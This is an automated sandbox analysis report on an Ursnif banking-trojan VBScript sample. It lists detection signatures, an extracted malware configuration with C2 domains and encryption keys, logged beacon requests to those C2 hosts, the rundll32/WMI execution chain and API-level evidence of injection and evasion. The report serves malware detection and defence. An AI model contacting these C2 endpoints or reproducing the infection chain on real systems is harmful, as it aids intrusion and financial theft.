Windows Analysis Report sample.vbs

Overview

General Information

Sample Name: sample.vbs
Analysis ID: 481106
MD5: 1dd89d4f6390f3dc46486ae6ee57bbf1
SHA1: 1be7d12e55659bdd87c34eb24d7d4adf0b68a2c5
SHA256: 801e42662653db4f680b49833f5ee0a48124aa814dd4178be1f948f4a8a68b07
Tags: vbs

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Compiles code for process injection (via .Net compiler)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

AV Detection:

Found malware configuration
Source: 00000012.00000003.755921050.0000000000AE0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Antivirus detection for URL or domain
Source: http://atl.bigbigpoppa.com/HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNW Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/ Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44eu Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNWGS38iu6HBSu0eZQC/bmSTwgO68w/mDzLSD0yv5NsCWUYa/KrMPefIXTo7Y/kYocGyKbfHI/qpROOMC7W3BpuS/FiHxn9Vj_2BE_2BRO1MPS/HSvVFR_2FvFubdta/FMJR0bw3OFOckhz/gihVzVqSiIHGsYLcl_/2FiUzDnO5/Znp2qHqDPmJt_2FKhKU2/B1dWx_2FKsmf5DpcS8Z/eu7lOAGu9ogHBSfDIGfPdL/lCnFrX6yLs9rJ/djJKkMKB/PGYeMNf7nd3nwYWaABiF0QM/d Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44euzNQd9TRf/1Zb3P4q5F0mc0qdltC/bLlV5uCsx/obqe2ve9g7Th5DnAa17u/ifRiDnyBBWyxfspwjbc/4e64zsAjWvHHh07WM2IgYy/t1JnmxqkM0edm/B_2Fp0Xl/aO6EV9JJQOgg5QsFoCbzQfO/_2BOZLcUIR/ooMrpCxMndVWwPntp/mvRIBZb_2B_2/Beg4_2F_2Fr/I_2FcfrvgLZ_2F/J3NCkzqZf5_2Fr1C_2BZp/h9SFOIo1qkmT8Tal/3qdDBO5XKEdw_2F/4xqo8eXRx/pJscFz7Rq/r Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/yycLCxNRZEFU2J4UrQOl/FX7uF3nnSEu1rXBTN4d/LylqoAvPuubQ7SHiRZfBKF/4dapCnHjf6OGO/yl6rivKE/fgvQJKMe8TaTP5ycHGNAJUS/0YTRa2nWMo/en2LMiL2tQIZKUpol/smZ_2B4BmeyI/57ObWaf9NZW/uHAXXMRRQnyL7K/pZ21NZyhAYoU6jMX_2FXx/_2F1viwpW6B_2BQx/yytF1Qgt5sD6QuY/yCiBnG89B2zLl6ouYK/ovFfokaNC/WnbbXZP7gD7mtpGqOSST/2_2Fq_2BjMeuOfq6Yo5/TugSOTNVmBx8AK0VzEQO9D/fxXdG0idPk4t/207vRTOEh/oW Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: atl.bigbigpoppa.com Virustotal: Detection: 8%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F23276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 18_2_00F23276
Source: Binary string: :C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.pdb source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.pdbXP=a source: powershell.exe, 00000016.00000002.885459267.00000200B1696000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.540443568.000001C497429000.00000004.00000001.sdmp, fum.cpp.0.dr
Source: Binary string: :C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.pdb source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.pdbXP=a source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000012.00000003.867779108.0000000005C00000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000012.00000003.867779108.0000000005C00000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05741577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 18_2_05741577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_057314A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 18_2_057314A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05746E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 18_2_05746E4E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05751802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 18_2_05751802

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49818 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49818 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49819 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49819 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49820 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49820 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49821 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49821 -> 185.251.90.253:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.251.90.253 80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SPRINTHOSTRU
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.251.90.253
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44euzNQd9TRf/1Zb3P4q5F0mc0qdltC/bLlV5uCsx/obqe2ve9g7Th5DnAa17u/ifRiDnyBBWyxfspwjbc/4e64zsAjWvHHh07WM2IgYy/t1JnmxqkM0edm/B_2Fp0Xl/aO6EV9JJQOgg5QsFoCbzQfO/_2BOZLcUIR/ooMrpCxMndVWwPntp/mvRIBZb_2B_2/Beg4_2F_2Fr/I_2FcfrvgLZ_2F/J3NCkzqZf5_2Fr1C_2BZp/h9SFOIo1qkmT8Tal/3qdDBO5XKEdw_2F/4xqo8eXRx/pJscFz7Rq/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /yycLCxNRZEFU2J4UrQOl/FX7uF3nnSEu1rXBTN4d/LylqoAvPuubQ7SHiRZfBKF/4dapCnHjf6OGO/yl6rivKE/fgvQJKMe8TaTP5ycHGNAJUS/0YTRa2nWMo/en2LMiL2tQIZKUpol/smZ_2B4BmeyI/57ObWaf9NZW/uHAXXMRRQnyL7K/pZ21NZyhAYoU6jMX_2FXx/_2F1viwpW6B_2BQx/yytF1Qgt5sD6QuY/yCiBnG89B2zLl6ouYK/ovFfokaNC/WnbbXZP7gD7mtpGqOSST/2_2Fq_2BjMeuOfq6Yo5/TugSOTNVmBx8AK0VzEQO9D/fxXdG0idPk4t/207vRTOEh/oW HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNWGS38iu6HBSu0eZQC/bmSTwgO68w/mDzLSD0yv5NsCWUYa/KrMPefIXTo7Y/kYocGyKbfHI/qpROOMC7W3BpuS/FiHxn9Vj_2BE_2BRO1MPS/HSvVFR_2FvFubdta/FMJR0bw3OFOckhz/gihVzVqSiIHGsYLcl_/2FiUzDnO5/Znp2qHqDPmJt_2FKhKU2/B1dWx_2FKsmf5DpcS8Z/eu7lOAGu9ogHBSfDIGfPdL/lCnFrX6yLs9rJ/djJKkMKB/PGYeMNf7nd3nwYWaABiF0QM/d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /M0s2qYX0svCgNwwi/PPI7Xc5SLSkLQIY/5lrOW2oNgPCEjObB3W/rK9MpeZNZ/UBjNTHqn019AlZCIEx5P/tkwag9cTBuiHiomNMOd/c4Fs5ApV0T_2BnjVwW3gyf/bJPiicUJ8f_2F/p_2BzDHN/AttyzxcYoU5_2FqrCObbGoi/jSm_2BVGxu/KGJY3tUfrdwytDYZ_/2BjCzYCnXysU/C2JbU3dlXVl/5uJ7MQlXxw8eLV/q0zaTcL3CTeSA980379DA/dHPHAS9NwOC9V6VK/lP_2FDVrlGe4ayd/LAmEzNRn3GukTSqHPk/HGsc32BVj/4Gvn4Q9G8MH6Q5yTHXJc/ulutZq7s HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic HTTP traffic detected: POST /W7oPFKe8v92MJK/3s9n12Zlxxip0RpYqadjX/SO7W1_2FF9Pkd4OV/Fr1cAJR5yzwxrV5/Jx7W_2FGpEVbkHb92i/nk7onhk3e/t3LARu0x8PsikCuNcG3A/xVZtlmy23EEwScpeJDo/wvuFYBZUTBSU84oV7Elz6G/vj_2F1HMVCKsF/ltj9usP8/bN_2Bx9_2BXwYInwNajYI72/h9Hrv5vhx_/2F82si9cIkqX7v6R4/9UOOaco5x39h/66X8TzwdR07/vkpw_2FwebnNKA/xttU1J1hU1aqHEwJ_2BPb/e_2FLASBRA3M51hv/aDQxYMFh2bS_2BM53oI/t HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic HTTP traffic detected: POST /08OHsz1N1FvuG6kjmE/aTh0zMsnZ/SI0oUmCO_2BS5MoLEECj/uZ7K5bJdnYQx3WN05uH/v_2Fm83_2BmFHvZHPW65zA/GW0_2BJDiUD1w/ZK6b_2Bh/StY6HpePFkaOsmwn5z64jk4/hNqOPWlFAk/QdUHTQ0be2zDX_2Bp/gFERm0UEw08y/zSKvozh3BGq/IuojbbR5mE_2FM/dq0z5j8vfE1Mb6ztPRP2X/B41DadMfELfCe7ey/X881VUbPPRiD756/vcgjm_2B6diCc8QiJ8/zWiCv09og/LPjcs0IySRyGzo4FtAjY/MaQN7Yj0rwdcUGBU3Lw/cxZIrRpMI9kt/XnFePhCWR/v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=124046255642640572323054504739User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 675Host: art.microsoftsofymicrosoftsoft.at
Source: rundll32.exe, 00000012.00000002.870125823.0000000000B1A000.00000004.00000020.sdmp String found in binary or memory: http://atl.bigbigpoppa.com/
Source: rundll32.exe, 00000012.00000003.809344105.0000000000B86000.00000004.00000001.sdmp String found in binary or memory: http://atl.bigbigpoppa.com/HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNW
Source: rundll32.exe, 00000012.00000003.797288272.0000000000B78000.00000004.00000001.sdmp String found in binary or memory: http://atl.bigbigpoppa.com/LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44eu
Source: rundll32.exe, 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000016.00000003.845905572.00000200ADF45000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000016.00000002.872992531.00000200AE2AF000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000016.00000002.872464143.00000200AE0A1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000016.00000002.872992531.00000200AE2AF000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000016.00000002.872992531.00000200AE2AF000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown HTTP traffic detected: POST /W7oPFKe8v92MJK/3s9n12Zlxxip0RpYqadjX/SO7W1_2FF9Pkd4OV/Fr1cAJR5yzwxrV5/Jx7W_2FGpEVbkHb92i/nk7onhk3e/t3LARu0x8PsikCuNcG3A/xVZtlmy23EEwScpeJDo/wvuFYBZUTBSU84oV7Elz6G/vj_2F1HMVCKsF/ltj9usP8/bN_2Bx9_2BXwYInwNajYI72/h9Hrv5vhx_/2F82si9cIkqX7v6R4/9UOOaco5x39h/66X8TzwdR07/vkpw_2FwebnNKA/xttU1J1hU1aqHEwJ_2BPb/e_2FLASBRA3M51hv/aDQxYMFh2bS_2BM53oI/t HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
Source: unknown DNS traffic detected: queries for: atl.bigbigpoppa.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000012.00000003.794954307.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794836470.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794735521.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.797221471.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794770084.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794874719.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794800647.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794900142.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794931081.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.801557253.000000000517C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6704, type: MEMORYSTR
Source: Yara match File source: 18.3.rundll32.exe.527a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.527a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.5328d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.52f94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.871947216.0000000004FFF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.799908702.000000000527A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.799937952.00000000052F9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.890326064.00000200BE266000.00000004.00000001.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: same Yara matches and the same CryptAcquireContextW code function (18_2_00F23276) as listed above under Key, Mouse, Clipboard, Microphone and Screen Capturing and Cryptography

System Summary:

Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0573E6B4 CreateProcessAsUserA, 18_2_0573E6B4
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F240DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 18_2_00F240DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F26EB3 GetProcAddress,NtCreateSection,memset, 18_2_00F26EB3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F27666 NtMapViewOfSection, 18_2_00F27666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F28055 NtQueryVirtualMemory, 18_2_00F28055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_057509D7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 18_2_057509D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0574B58C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 18_2_0574B58C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0574F7F5 NtQueryInformationProcess, 18_2_0574F7F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0575079B GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 18_2_0575079B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05746657 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 18_2_05746657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05740E3E NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 18_2_05740E3E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05735166 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 18_2_05735166
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05739D36 NtGetContextThread,RtlNtStatusToDosError, 18_2_05739D36
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_057455D6 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 18_2_057455D6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05745878 memset,NtWow64QueryInformationProcess64,GetProcAddress, 18_2_05745878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05740CEF NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 18_2_05740CEF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05748890 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 18_2_05748890
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0574A71C NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 18_2_0574A71C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05740FBD memset,NtQueryInformationProcess, 18_2_05740FBD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0574FBB9 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 18_2_0574FBB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05750BAB NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 18_2_05750BAB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0573579C NtQuerySystemInformation,RtlNtStatusToDosError, 18_2_0573579C
PE file does not import any functions
Source: cshxvr3e.dll.26.dr Static PE information: No import functions for PE file found
Source: kuljoghz.dll.24.dr Static PE information: No import functions for PE file found
Java / VBScript file with very long strings (likely obfuscated code)
Source: sample.vbs Initial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\fum.cpp 8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\sample.vbs'
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
